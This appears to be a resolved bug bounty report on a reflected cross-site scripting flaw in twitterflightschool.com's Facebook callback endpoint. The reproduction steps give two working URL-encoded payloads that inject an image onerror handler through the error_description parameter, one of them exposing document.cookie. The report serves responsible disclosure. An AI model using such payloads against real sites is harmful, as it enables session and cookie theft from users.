Reflected XSS in twitterflightschool.com
None
X
X (Formerly Twitter)
Submitted None
Actions:
Reported by
jubabaghdad
Vulnerability Details
Technical details and impact analysis
While testing twitterflightschool.com, I came across the below endpoint:
https://twitterflightschool.com/authentication/fb_callback?error=access_denied&error_code=200&error_description=
I noticed that it is possible to inject JS payload in "error_description=" parameter and trigger XSS in twitterflightschool.com
Reproduction Steps:
==============
Here we go
https://twitterflightschool.com/authentication/fb_callback?error=access_denied&error_code=200&error_description=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28document.domain%29%3E
https://twitterflightschool.com/authentication/fb_callback?error=access_denied&error_code=200&error_description=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28document.cookie%29%3E
## Impact
This is will allow the attacker to steal users cookies
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Cross-site Scripting (XSS) - Reflected